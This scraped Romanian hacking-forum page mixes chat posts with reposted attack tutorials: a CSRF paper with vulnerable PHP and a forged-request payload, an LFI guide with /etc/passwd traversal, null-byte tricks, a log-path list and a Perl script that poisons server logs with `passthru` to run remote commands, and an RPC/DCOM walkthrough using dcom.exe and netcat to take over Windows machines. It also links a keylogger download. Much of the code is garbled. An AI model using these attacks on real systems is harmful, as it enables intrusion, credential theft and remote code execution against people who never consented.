SilentPH

O singura melodie de la Nane imi place , ai un om ... Atat , restu sunt de tot cacatu`

Prefer clar Cola !

Asa ai facut tu cele 229 de posturi ?

Robert1995 . Abtine`te . Nu dovedesti decat ca esti un copil ratat si pupincurist .

E putin cretin TinKode , asta e parerea mea . Daca omu` spune pe blog ce "lovituri" da , e clar ca ceva e neinregula cu el .

Nu m`ai murim in 2012 ? Ce naspa . Aiurea ...

Si eu l`am primit chiar azi ... Aiurea .

Locul 9 . Destul de bine . Sa ai bafta in continuare .

Cross Site Request Forgery [CSRF / XSRF] Author: Tec-n0x;) Date: 03/4/2008 Www.Editcodex.NET Contact: Tec-n0x [at] hotmail [dot] com ====================================== [+] Index [+] => 0x001 <= => Introduction => 0x002 <= => How does the CSRF / Small example => 0x003 <= => Code an application Vulnerable => 0x004 <= => Avoiding the CSRF => 0x005 <= => Farewell ====================================== [+] Introduction [+] Well, in this paper we will talk about what is CSRF / XSRF [Cross Site Request Forgery]. Try to explain everything possible on this vulnerability and most importantly .. As prevent these attacks. Let's start .. =) ====================================== [+] How does the CSRF [+] Well, the CSRF the attacker tries to "Forcing" some malicious code exploiting a meeting open or not expired for the victim to achieve that the victim do what we want. [+] Fuller definition (Thanks C1c4Tr1Z): [+] An attack based on the use of <tags> html performed by a petition HTTP GET direct action (eg <img src=http://mail.google.com/mail/?logout&hl=es>) or an indirect action (eg <img src=http://www.atacante.com/xsrf.html>), using an HTML file petitions to conduct POST / GET, without the victim of this attack of its consent or approval, as it is an attack which operates silently. This attack can in turn take advantage of cookies (active or expired) or while performing actions that are not used in any type of site. [+] Small Example [+] Well, let's say that we are currently logged in a forum .. and a user sends us a private message telling us something like: "Hello, that looks good tutorial C + + .. [Click Here <= Maliciosa URL]" And let's say that when the user click on the link it will lead to a page more or less like this: http://site.com/foro/index.php?action=logout This would close the user's session .. but what would happen if instead of closing the user's session may change any of its data as email / password .. ====================================== [+] Code an application Vulnerable [+] This application will be an account .. Say it is a hosting of images called "MyHosting" ... And if we change our data (Email / password, etc.) .. We have a form as follows: / / Index.php ================================================== ================ <form method="POST" action="datos.php" name="datos"> User <input type="text" name="usuario"> Email <input type="text" name="email"> Password <input type="text" name="contraseña"> Email alternative: <input type="text" name="emailalternativo"> <input type="submit" name="submit" value="cambiardatos"> </ form> ================================================== ================ / / Index.php End =========================================== ================================================== ================ / / Datos.php <? session_start (); if (isset ($ _REQUEST [ 'user'])) $ user = $ _REQUEST [ 'user']; Else die ( "Fill the field User"); if (isset ($ _REQUEST [ 'email'])) $ email = $ _REQUEST [ 'email]; Else die ( "Fill in the email field"); if (isset ($ _REQUEST [ 'password'])) $ password = $ _REQUEST [ 'password]; Else die ( "Fill the Password field"); if (isset ($ _REQUEST [ 'emailalternativo'])) emailalternativo $ = $ _REQUEST [ 'emailalternativo]; Else die ( "Missing email alternative"); / / Let's say this function called CambiarDatos / / Is the updating of data in our beloved premium account MyHosting CambiarDatos ($ user, $ email, $ password, $ emailalternativo); > ================================================== ================ Then, when change our data .. url would have a more or less like this: http://http://myhosting.com/Datos.php.php?usuario=Tec-n0x&email=mymail & @ gmail.com password = mypass123 & emailalternativo = mymail2@gmail.com So here is the danger ... What if we are currently logged on page .. and a user sends us a link and we see .. which contains a code like this: ================================================== ================ <html> <head> Hi <title> </ title> </ head> <body> <img src="http://http://myhosting.com/Datos.php.php?usuario=Tec-n0x&email=atackermail@gmail.com&contraseña=atackerpassword&emailalternativo=atackermail2@gmail.com"> </ Body </ html> ================================================== ================ If the user was logged in Myhosting.com and the victim saw this page .. What? It would send an HTTP request to MyHosting and change user data .. =========================================== [+] Avoiding the CSRF [+] Well, let's use as an example MyHosting .. We index.php (I have added a field called "actualcontraseña") ================================================== ================ <form method="POST" action="datos.php" name="datos"> User <input type="text" name="usuario"> Email <input type="text" name="email"> Password <input type="text" name="contraseña"> Email alternative: <input type="text" name="emailalternativo"> Actual Password: <input type="text" name="actualcontraseña"> <input type="submit" name="submit" value="cambiardatos"> </ form> ================================================== ================ A file called "config.php" that will connect to the bd: ================================================== ================ <? PHP $ bd_host = "localhost"; $ bd_usuario = "user"; $ bd_password = "pass"; $ bd_base = "bd"; with $ = mysql_connect ($ bd_host, $ bd_usuario, $ bd_password); mysql_select_db ($ bd_base, with $); > ================================================== ================ And File datos.php "but .. Amended: ================================================== ================ <? include ( 'config.php'); session_start (); if (isset ($ _REQUEST [ 'user'])) $ user = $ _REQUEST [ 'user']; Else die ( "Fill the field User"); if (isset ($ _REQUEST [ 'email'])) $ email = $ _REQUEST [ 'email]; Else die ( "Fill in the email field"); if (isset ($ _REQUEST [ 'password'])) $ password = $ _REQUEST [ 'password]; Else die ( "Fill the Password field"); if (isset ($ _REQUEST [ 'emailalternativo'])) emailalternativo $ = $ _REQUEST [ 'emailalternativo]; Else die ( "Missing email alternative"); if (isset ($ _REQUEST [ 'actualcontraseña'])) actualcontraseña $ = $ _REQUEST [ 'actualcontraseña]; Else die ( "Enter password"); if ($ actualcontraseña == NULL) ( echo "Enter your password Current"; else () $ query = mysql_query ( "SELECT user actualcontraseña FROM myhosting_usuarios where username = '$ user'") or die (mysql_error ()); $ data = mysql_fetch_array ($ query); if ($ data [ 'PASSWORD']! = $ actualcontraseña) ( echo "Actual Inavalida Password"; else () CambiarDatos ($ user, $ email, $ password, $ emailalternativo); > ================================================== ================ What we do in this case would select the BD Since the current password in the table myhosting_usuarios from the field "PASSWORD" if different .. Do not change the data if the password matches .. this operation is performed .. in this case .. make an update to the table "myhosting_usuarios" changing data user. Obviously if they want to test code in localhost will have to modify and create a bd the changing role of user data ... They can use this query .. ================================================== ================ Create table myhosting_usuarios `` ( `id` int (11) NOT NULL auto_increment, `` user varchar (15) NOT NULL, Email `` varchar (15) NOT NULL, `` emailalternativo varchar (15) NOT NULL, `password` varchar (150) NOT NULL, `` PASSWORD varchar (150) NOT NULL, KEY `id` ( `id`) ) = MyISAM engine; INSERT INTO `myhosting_usuarios` values (1, 'Tec-n0x', 'mymail@gmail.com', 'mymail2@gmail.com', 'mypass',' mypass'); ================================================== ================ Another way to prevent these attacks .. would be using Captcha .. Here a code: ================================================== ================ <? PHP /************************************************* ************************** * * Filename: image.php * Began: 2005/04/04 * Modified: * Copyright © 2005 xkare.com * Version: 1.0 * Written by: Mert ÖÐÜT in istanbul / TURKEY * * You are encouraged to redistribute and / or modify this program under the terms of * The GNU General Public License as published by the Free Software Foundation * (Www.fsf.org); any version as from version 2 of the License. * ************************************************** *************************/ session_start (); strrand function ($ length) ( $ str = ""; while (strlen ($ str) <$ length) ( $ random = rand (48.122); if (($ random> 47 & & $ random <58)) ( $ str .= chr ($ random); ) ) return $ str; ) $ text = $ _SESSION [ 'string'] = strrand (5); $ img_number = imagecreate (47.17); $ BackColor = imagecolorallocate ($ img_number, 244244244); $ textcolor = imagecolorallocate ($ img_number, 0,0,0); imagefill ($ img_number, 0.0, $ BackColor); imagestring ($ img_number, 50,1,1, $ text, $ textcolor); header ( "Content-type: image / png"); imagejpeg ($ img_number); > ================================================== ================ We create a text field called code ================================================== ================ <input type='text' size='5' maxlength='5' name='code'> <img src="image.php"> ================================================== ================ And verify that the code is valid .. ================================================== ================ if ($ _POST [ 'code']!=$_ SESSION [' string ']) ( echo "error in the security code"; exit (); ) ================================================== ================ =========================================== [+] Farewell [+] Well, I hope they have served this paper on CSRF =) Gr33tz t0: Celciuz, You_kn0w, C1c4Tr1Z, NOX, M-Black, lEnergy, Syst3m-c0der, etc. =) Www.Editcodex.NET Greetings, Tec-n0x;) # Milw0rm.com [2008-05-14]

De ce ai facut topicu` asta ? Sa te certi cu lumea ? aiurea ...

Uploadeaza`l din nou te rog

Download Ardamax Keylogger 2.8.zip - FisierulMeu.ro Era chiar pe prima pagina ...

Vai de capu` lor . I`a prostit facebook`ul rau de tot pe astia !

Sa ai bafta !

Poi e o noutate , pt. ca articolul din jurnalul a aparut azi 18.05.2011 la ora 10 . Parerea mea despre articol: Inseamnca ca omu`e cretin daca afirma chiar el asa ceva , desi nu cred ca e pe bune treaba . Cred ca articolul e facut aiurea .

Dati un search pe google ... Cu programu` si versiunea , si il gasiti . Chiar asteptati totul pe tava ? Mai descurcati`va si singuri

Valcea si sibiu

Sa ai bafta !

Poate are timp cineva care se pricepe sa ii puna si din celelalte judete .

Hai noroc !

Sa ai bafta

Ma dar ce le sti pe toate silvian0 . Mersi . Am editat.

Buna ziua! In acest tutorial o sa invatati cum cum sa exploatati vulnerabilitatea LFI dintr-un site. Mai intai, sa vedem acest mic cod php: <?php $page = $_GET ; include($page); ?> Acesta este un cod care nu ar trebui folosit niciodata, vulnerabil la LFI, pentru ca variabila $page nu este santinizata. Ok, acum sa profitam de aceasta vulnerabilitate, folosind urmatorul cod: site.host/index.php?page=../../../../../../../etc/passwd In unele cazuri nu mai este nevoie sa punem ../../../../../../.., etc/passwd fiind de ajuns pentru a avea acces unde trebuie Daca siteul este gazduit Unix, parolele userilor sunt stocate in /etc/passwd (in cazul in care parola nu este shadow, in acest caz ea aflandu-se in /etc/shadow, unde vom putea avea acces doar daca am avea drepturi de root), si codul de mai sus ne arata aceste parole si usernameurile. Acum tot ce mai ai de facut este sa decodezi parola. O parola criptata(in acest caz, parola este shadowed si se afla in /etc/shadow), ar trebui sa arate cam asa: username: x:503:100:FullName:/home/username:/bin/sh In acest caz, parola este shadowed si se afla in /etc/shadow), alt exemplu de parola fiind: username:!:503:100:FullName:/home/username:/bin/sh Alte "locuri" unde puteti gasi parolele in afara de /etc/passwd ar cam fi: /etc/shadow /etc/group /etc/master.passwd /etc/security/group /etc/security/passwd /etc/security/user /etc/security/environ /etc/security/limits In caz ca Browserul va arata la sfarsitul includerii un .php (si automat. /etc/passwd.php nu va mai exista), adaugati la sf includerii %00, serverul va omite tot ce scrie dupa %00. Exemplu de cod: site.host/index.php?file=../../../../../../../../etc/passwd%00 Acum vom incerca sa rulam comenzi pe server injectand coduri php in loguri, apoi rulandu-le. Cateva adrese de loguri: ../apache/logs/error.log ../apache/logs/access.log ../../apache/logs/error.log ../../apache/logs/access.log ../../../apache/logs/error.log ../../../apache/logs/access.log ../../../../../../../etc/httpd/logs/acces_log ../../../../../../../etc/httpd/logs/acces.log ../../../../../../../etc/httpd/logs/error_log ../../../../../../../etc/httpd/logs/error.log ../../../../../../../var/www/logs/access_log ../../../../../../../var/www/logs/access.log ../../../../../../../usr/local/apache/logs/access_log ../../../../../../../usr/local/apache/logs/access.log ../../../../../../../var/log/apache/access_log ../../../../../../../var/log/apache2/access_log ../../../../../../../var/log/apache/access.log ../../../../../../../var/log/apache2/access.log ../../../../../../../var/log/access_log ../../../../../../../var/log/access.log ../../../../../../../var/www/logs/error_log ../../../../../../../var/www/logs/error.log ../../../../../../../usr/local/apache/logs/error_log ../../../../../../../usr/local/apache/logs/error.log ../../../../../../../var/log/apache/error_log ../../../../../../../var/log/apache2/error_log ../../../../../../../var/log/apache/error.log ../../../../../../../var/log/apache2/error.log ../../../../../../../var/log/error_log ../../../../../../../var/log/error.log Ok, acum sa aruncam o privire asupra logului in care se salveaza paginile care nu exista si urmatorul cod: <? passthru($_GET[cmd]) ?>. Daca scriem in browser: site.host/<? passthru($_GET[cmd]) ?> O sa ne arate evident o pagina in care scrie ca acest cod nu exista pe server, deoarece browserul encodeaza automat URL'ul si pagina pe care noi am accesat-o, browserul o traduce in: site.host/%3C?%20passthru($_GET[cmd])%20?> Deci va trebui sa facem altceva... Putem utiliza urmatorul script perl: #!/usr/bin/perl -w use IO::Socket; use LWP::UserAgent; $site="victim.com"; $path="/folder/"; $code="<? passthru($_GET[cmd]) ?>"; $log = "../../../../../../../etc/httpd/logs/error_log"; print "Trying to inject the code"; $socket = IO::Socket::INET->new(Proto =>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die " Connection Failed. "; print $socket "GET ".$path.$code." HTTP/1.1 "; print $socket "User-Agent: ".$code." "; print $socket "Host: ".$site." "; print $socket "Connection: close "; close($socket); print " Code $code sucssefully injected in $log "; print " Type command to run or exit to end: "; $cmd = <STDIN>; while($cmd !~ "exit") { $socket = IO::Socket::INET->new(Proto =>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die " Connection Failed. "; print $socket "GET ".$path."index.php=".$log."&cmd=$cmd HTTP/1.1 "; print $socket "Host: ".$site." "; print $socket "Accept: */* "; print $socket "Connection: close "; while ($show = <$socket>) { print $show; } print "Type command to run or exit to end: "; $cmd = <STDIN>; } Copy/Paste la chestia asta si salveaz-o ca ex.pl, dar nu uita sa modifici in exploit urmatoarele lucruri: 1) modifica numele siteului 2) modifica numele logului si calea catre el 3) schimba index.php= cu ce doresti tu Rulati scriptul si el va va intreba ce comenzi sa rulati !!! Va descurcati de aici incolo !!! Linkuri utile: http://www.milw0rm.com/video/watch.php?id=57 Sursa: http://hackpedia.info/viewtopic.php?f=21&t=1644

Am dat edit ... Daca doriti il puteti sterge .Dar am cautat si nu`l am gasit . Acum e mai la indemana . Nu am stiut ca era si pe rst . Eu il aveam prin Pc .

What is RPC exploit. RPC stands for Remote Procedure Call. The vulnerability lies in the way RPC is implemented in most versions of Windows. The flaw involves the Distributed Component Object Model (DCOM) interface with RPC, which listens on TCP/IP port 135 and other ports. When exploited via those ports, a buffer overflow is created that could allow remote attackers to run commands with the highest system privileges. Operating systems affected Microsoft Windows NTA® 4.0 Microsoft WindowsA® 2000 Microsoft Windows XP Microsoft Windows Server 2003 NOTE: Microsoft Windows Millennium, 95, 98, 98 SE are not affected. Tools to use. Well, there are many programs out there for u to download and use for attack. Lets see some: Angry Ip Scanner (in our "Scanners" download section) dcom.exe (download the one for ur need here ) nc.exe (in our "Scanners" download section) RPC Exploit GUI v2 here How to use them. Angry Ip Scanner: First of all, open Angry Ip Scanner and scan an ip range for 135 port. dcom.exe: U must run it from ur MS-DOS prompt (START ---> Run ---> cmd). Then just type dcom ex. dcom 5 127.0.0.0 (pls note that when u 'll run the dcom.exe it 'll show u which number indicates each OS... in this example i use number 5). nc.exe: Just run nc.exe (from ur MS-DOS prompt again) and type nc 4444 (pls note that nc might be nc***... jst use its name or rename it to nc). Now type in net user Administrator (choose ur own pass). So, if everything went right, go to ur START ---> run ---> mstsc and just type in ur victim's ip and press connect. When connected, do whatever u like. RPC Exploit GUI v2: Not much to say excepts that works fine (ur antivirus might get this as infected or as Hacktool (read "Antiviruses" in tutorials section). Much more easier than the whole procedure describe above. Howto protect ur self Microsoft offers a freely downloadable patch for this vulnerability. Its available at: Windows NT Cod: http://download.microsoft.com/download/6/5/1/651c3333-4892-431f-ae93-bf8718d29e1a/Q823980i.EXE Windows 2000 Cod: http://download.microsoft.com/download/0/1/f/01fdd40f-efc5-433d-8ad2-b4b9d42049d5/Windows2000-KB8239 80-x86-ENU.exe Windows XP Cod: http://download.microsoft.com/download/9/8/b/98bcfad8-afbc-458f-aaee-b7a52a983f01/WindowsXP-KB823980 -x86-ENU.exe NOTE: If there is a broken link, is not our false. Just visit Microsoft Download Center and search for ur self for the patch or just use the windows live update.